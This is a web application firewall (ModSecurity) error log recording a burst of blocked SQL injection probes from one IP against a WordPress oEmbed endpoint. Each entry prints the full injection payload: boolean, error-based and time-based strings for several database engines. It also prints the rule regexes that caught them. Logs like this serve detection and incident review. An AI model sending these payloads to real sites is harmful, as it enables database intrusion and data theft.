31519:tid 139653839529728] [client 141.98.81.52:56556] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/) AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND (7224=7224"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26hnxeJlWfH1pdny5W-wAAANM"] [Thu Aug 15 03:21:26.691145 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:56558] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/ AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26huwCyyCVFXh0DMS2WwAAAIY"] [Thu Aug 15 03:21:27.087027 2024] [:error] [pid 31336:tid 139653881493248] [client 141.98.81.52:56562] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/') AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND ('DKHs'='DKHs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26h0PAyXqJhbW53WyPPgAAAE4"] [Thu Aug 15 03:21:27.501886 2024] [:error] [pid 31335:tid 139653831137024] [client 141.98.81.52:56564] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/' AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND 'cNlB'='cNlB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26h20MD5oChETZltkVNgAAABQ"] [Thu Aug 15 03:21:27.996054 2024] [:error] [pid 31336:tid 139653839529728] [client 141.98.81.52:56566] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/%' AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26h0PAyXqJhbW53WyPPwAAAFM"] [Thu Aug 15 03:21:28.377478 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56568] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:url: https://investigacionperu.com/contacto/ AND 3435=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (3435=3435) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113)))-- aHxA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26iHxeJlWfH1pdny5W_AAAANc"] [Thu Aug 15 03:21:28.837399 2024] [:error] [pid 31335:tid 139653940242176] [client 141.98.81.52:56572] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/) AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (7239=7239"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [t [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26iG0MD5oChETZltkVOAAAAAc"] [Thu Aug 15 03:21:29.278241 2024] [:error] [pid 31335:tid 139654041286400] [client 141.98.81.52:56574] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26iW0MD5oChETZltkVOQAAAAM"] [Thu Aug 15 03:21:29.794312 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56578] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/') AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('JbWk'='JbWk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1" [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26iXxeJlWfH1pdny5W_QAAANI"] [Thu Aug 15 03:21:30.167215 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:56580] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/' AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'AiTh'='AiTh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26inxeJlWfH1pdny5W_gAAAMg"] [Thu Aug 15 03:21:30.577932 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:56582] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/%' AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag " [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26inxeJlWfH1pdny5W_wAAAMA"] [Thu Aug 15 03:21:31.008117 2024] [:error] [pid 31335:tid 139654066464512] [client 141.98.81.52:56584] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/ AND 5419=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (5419=5419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- Llvc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6 [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26i20MD5oChETZltkVOgAAAAA"] [Thu Aug 15 03:21:31.481056 2024] [:error] [pid 31335:tid 139653805958912] [client 141.98.81.52:56590] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: (SELECT 7365 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(7365=7365,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26i20MD5oChETZltkVOwAAABc"] [Thu Aug 15 03:21:32.081057 2024] [:error] [pid 31337:tid 139653881493248] [client 141.98.81.52:56592] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:url: (SELECT CONCAT(0x7162626271,(SELECT (ELT(1950=1950,1))),0x7162707871))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jOwCyyCVFXh0DMS2XQAAAI4"] [Thu Aug 15 03:21:32.494240 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:56594] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: (SELECT (CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jHxeJlWfH1pdny5XAQAAAMU"] [Thu Aug 15 03:21:32.935536 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:56598] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:url: (SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (2067=2067) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jHxeJlWfH1pdny5XAwAAANU"] [Thu Aug 15 03:21:33.316810 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:56600] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jewCyyCVFXh0DMS2XgAAAIE"] [Thu Aug 15 03:21:33.656057 2024] [:error] [pid 31337:tid 139654066464512] [client 141.98.81.52:56602] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jewCyyCVFXh0DMS2XwAAAIA"] [Thu Aug 15 03:21:34.083623 2024] [:error] [pid 31337:tid 139654049679104] [client 141.98.81.52:56604] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26juwCyyCVFXh0DMS2YAAAAII"] [Thu Aug 15 03:21:34.452745 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:56606] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: 